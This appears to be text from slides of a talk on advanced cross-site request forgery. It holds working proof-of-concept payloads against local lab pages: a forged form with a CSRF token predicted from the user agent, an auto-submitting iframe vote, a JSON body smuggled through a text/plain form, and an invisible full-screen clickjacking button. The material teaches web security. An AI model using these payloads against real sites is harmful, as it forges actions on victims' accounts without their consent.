$token = sha1($_SERVER['HTTP_USER_AGENT']);
if (isset($_POST['token'])) {
ex2-1
ex2-1
<html>
<header>
<script
src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/rollups/sha1.js"></script>
</header>
<body onload="loaded();" >
<iframe name="iframe"></iframe>
<form name="frmCSRF" method="POST"
action="http://localhost/advanced-csrf/leaking/index.php" target="iframe">
<input type="text" name="token" id="token" value="" />
<textarea name="msg" cols="15" rows="5">harharhar</textarea>
</form>
<script type="text/javascript">
function loaded() {
document.getElementById('token').value = CryptoJS.SHA1(navigator.userAgent);
document.frmCSRF.submit();
}
</script>
</body>
</html>
ex2-2
<script type="text/javascript">
function loaded() {
$("#ifr").contents().find("select option[value=banana]").attr("selected",true);
$("#ifr").contents().find("form").submit();
}
</script>
<iframe onload="javascript:loaded()" id="ifr" src="./vote.php"></iframe>
ex2-3
{ "subscribe_to": "weekly_newsletter", "mail": "john@doe.com" }
<form method="POST"
action="http://localhost/advanced-csrf/ex2-3/subscribe.php"
enctype="text/plain">
<input type='text'
name='{"subscribe_to":"weekly_newsletter","mail":"hon@doe.com", "ignore_me":"'
value='"}' />
<input type="submit" value="send" />
</form>
{ 'subscribe_to': 'weekly_newsletter', 'mail': 'john@doe.com', 'ignore_me': '"}' }
ex2-4
<form method="POST"
action="http://localhost/advanced-csrf/ex2-4/api.php"
enctype="text/plain">
<input
type='text'
name='{"action":"reset-voting","value":"all", "ignore_me":"' value='"}' />
<input type='submit'
value="submit"
style="position:fixed;top:0;left:0;width:100%;height:100%;opacity:0;"
/>
</form>
Dankeschön!
audience.ask(questions);
This presentation is licensed under the
Creative Commons Attribution 4.0 International
license.